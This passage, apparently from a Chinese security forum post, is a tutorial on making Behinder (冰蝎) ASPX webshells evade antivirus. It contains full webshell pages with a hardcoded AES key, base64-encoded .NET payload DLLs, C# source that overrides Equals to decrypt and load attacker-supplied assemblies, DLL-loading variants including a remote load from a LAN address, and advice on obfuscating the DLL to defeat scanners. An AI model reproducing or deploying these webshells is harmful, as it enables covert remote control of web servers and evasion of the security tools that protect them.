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";
    Type type = Assembly.Load(Convert.FromBase64String(dll)).GetType("payload01.Class");
    object obj = Activator.CreateInstance(type);
    MethodInfo mf = type.GetMethod("test");
    object[] paras = new Object[] { k };
    ICryptoTransform it = (ICryptoTransform)mf.Invoke(obj, paras);
    byte[] xx  = it.TransformFinalBlock(c, 0, c.Length);
    Assembly.Load(xx).CreateInstance("U").Equals(this);
%>





(2)整个过程写入dll--重写Equals方法(dll直接放入)

在上面我们只是将某个具有特征的部分写入dll中以达到消除特征的目的,在实际中我们还可以将冰蝎3.05的整个过程写入dll中以达到绕过的目的。过程类似于冰蝎的原理,即重写Equals方法,将冰蝎的整个代码放入里面,然后在我们的木马中直接调用重写的Equals方法即可。


payload02类如下:


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
namespace paylaod02
{
    public class Class1
    {
        public override bool Equals(object obj)
        {
            try
            {
                payload(obj);
            }
            catch (Exception e)
            {
                return false;
            }
            return true;
        }

        private void payload(object obj)
        {
            List<Object> ll = (List<Object>)obj;

            String str = (String)ll[0];
            string strkey = str.Split(',')[0];
            string strpayload = str.Split(',')[1];
            byte[] k = Convert.FromBase64String(strkey);
            byte[] c = Convert.FromBase64String(strpayload);
            RijndaelManaged en = new RijndaelManaged();
            Assembly.Load(en.CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(ll[1]);
        }
    }
}

编译为dll并转为base64编码的格式,然后在aspx中加载它。

PS:编译的时候最好在.net2.0下编译,因为很多windows系统都是默认支持.net2.0,如果是以.net4.0编译的后期加载可能会出现一些不兼容的问题。shell04.aspx


1
2
3
4
5
6
7
8
9
<%@ Page Language="C#" %>
<%@Import Namespace="System.Reflection"%>
<%@Import Namespace="System.Collections.Generic"%>
<%Session.Add("k","e45e329feb5d925b");
byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);
string dll = "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cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARnJvbUJhc2U2NFN0cmluZwBvYmoAVHJhbnNmb3JtRmluYWxCbG9jawBwYXlsYW9kMDIuZGxsAGdldF9JdGVtAFN5c3RlbQBTeW1tZXRyaWNBbGdvcml0aG0ASUNyeXB0b1RyYW5zZm9ybQBTeXN0ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24AQ2hhcgAuY3RvcgBDcmVhdGVEZWNyeXB0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEVxdWFscwBPYmplY3QAU3BsaXQAQ29udmVydABTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5AEFzc2VtYmx5AAAAAANVAAAAAADUu9OoxyROQ6qw411Pxo/8AAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIFBwISRQIQBwcVEkkBHA4ODh0FHQUSTQUVEkkBHAUgARMACAYgAR0OHQMFAAEdBQ4IIAISYR0FHQUIIAMdBR0FCAgGAAESZR0FBCABHA4EIAECHAi3elxWGTTgiQQgAQEcCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAcBAAAAAA4BAAlwYXlsYW9kMDIAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMjEAACkBACRkMTMxNjY4MS1hYTVlLTRiMjMtOGY4MS1iMzRiNzRjNzMwZDkAAAwBAAcxLjAuMC4wAABHAQAaLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjABAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lEC5ORVQgRnJhbWV3b3JrIDQAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAUOgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=";
String ee = Convert.ToBase64String(k) + ',' + Convert.ToBase64String(c);
List<Object> ll = new List<Object>();ll.Add(ee);ll.Add(this);
Assembly.Load(Convert.FromBase64String(dll)).CreateInstance("paylaod02.Class1").Equals(ll);%>

运行结果:






拓展:思路分析(小技巧,可细品哦!)


分析原来冰蝎的调用执行语句可以发现,需要传入密钥k、内容c和当前页面指针this三个参数的,而我们重写的equals函数只有object一个参数,因此我们需要尝试将三个参数合并为一个object对象参数传给重写的equals方法。三个参数的类型是不一样的,那么我们该怎么去合并这三个参数呢?

1
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);

这里我们使用的是利用Lsit<object>类ll。然后将密钥k和内容c拼接成为“k+逗号(,)+c”的格式合并为一个String类ee,然后通过add方法将ee和this指针添加到ll中去,最后将ll作为参数传入到重写的Equals方法。

1
2
String ee = Convert.ToBase64String(k) + ',' + Convert.ToBase64String(c);
List<Object> ll = new List<Object>();ll.Add(ee);ll.Add(this);

由于我们将三个参数放入在ll类中,因此当我们取出的时候需要注意参数在ll类中的位置。并且由于密钥k和内容c拼接成为“k+逗号(,)+c”的格式组合在一起了,因此我们取出密钥k和内容c的时候可以通过逗号将二者进行分开。

1
2
3
String str = (String)ll[0];
string strkey = str.Split(',')[0];
string strpayload = str.Split(',')[1];

(3)变换加载方式


上面两种方法的dll都是直接存放在后门文件中,然后使用Assembly.Load加载,这种方法很方便,但是也存在很大的弊端,那就是文件太大了,,,因此我们可以想办法把dll文件分离出来,即将dll放入一个文件,然后加载器单独加载分离出来的dll。三种加载方法代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
//(1)绝对路径加载
string path = @"D:\Program Files (x86)\Microsoft Visual Studio\MyProjects\payload\Payload\Payload\bin\Debug\Payload.dll";
Assembly myAssebly = System.Reflection.Assembly.LoadFile(path);

//(2)远程加载--失败
string path = @"http://192.168.48.15:8088/Payload.dll";
Assembly myAssebly = System.Reflection.Assembly.LoadFrom(path);

//(3)相对路径加载
string path1 = Directory.GetCurrentDirectory();
Console.WriteLine(path1);
Assembly myAssebly = Assembly.LoadFile(path1 + "\\Payload.dll");
//以上是控制台执行是的相对目录,在aspx中运行时会报错,因此我们需要换一种获取档期目录的方法
string path1 = Request.PhysicalApplicationPath + "\\paylaod02.dll";
Assembly myAssebly = System.Reflection.Assembly.LoadFrom(path);

A.绝对路径加载

缺陷较大,毕竟路径我们一般很难猜测出来。shell05.aspx

1
2
3
4
5
6
7
8
9
10
11
<%@ Page Language="C#" %>
<%@Import Namespace="System.Reflection"%>
<%@Import Namespace="System.IO"%>
<%@Import Namespace="System.Collections.Generic"%>
<%Session.Add("k","e45e329feb5d925b");
    byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);
    string path1 = @"C:\inetpub\wwwroot\test\paylaod02.dll";
    String ee = Convert.ToBase64String(k) + ',' + Convert.ToBase64String(c);
    List<Object> ll = new List<Object>();ll.Add(ee);ll.Add(this);
    Assembly.LoadFile(path1).CreateInstance("paylaod02.Class1").Equals(ll);
%>




B.相对路径加载

需要上传一个dll,然后在执行如下文件。shell06.aspx

1
2
3
4
5
6
7
8
9
10
<%@ Page Language="C#" %>
<%@Import Namespace="System.Reflection"%>
<%@Import Namespace="System.IO"%>
<%@Import Namespace="System.Collections.Generic"%>
<%Session.Add("k","e45e329feb5d925b");
    byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);
    String ee = Convert.ToBase64String(k) + ',' + Convert.ToBase64String(c);
    List<Object> ll = new List<Object>();ll.Add(ee);ll.Add(this);
    Assembly.LoadFile(Request.PhysicalApplicationPath + "\\paylaod02.dll").CreateInstance("paylaod02.Class1").Equals(ll);
%>




(4)dll混淆

上面的代码目前可以过杀软,但是不代表可以一直绕过杀软,因为dll是我们固定的,要绕过杀软就得对dll进行混淆,这样的出的dll便会不相同了。那么我们该怎么去混淆它呢??
花指令填充(增加一些不影响原来程序执行的指令)、类填充(将简单的类复杂化,可以添加一些类的属性、方法之类,这样编译出来的dll便会不一样)、dll加解密(对base64加密后的文本再次进行md5或其他加密使得程序变得复杂化)。


参考链接:

【1】【原创】利用动态二进制加密实现新型一句话木马之Java篇

【2】【原创】利用动态二进制加密实现新型一句话木马之.NET篇

【3】C# 终极基类Object介绍

【4】C#实现将字符串转换成代码并执行

【5】AES/ECB/NOPADDING数据加解密







回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-28 18:24 , Processed in 0.018298 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表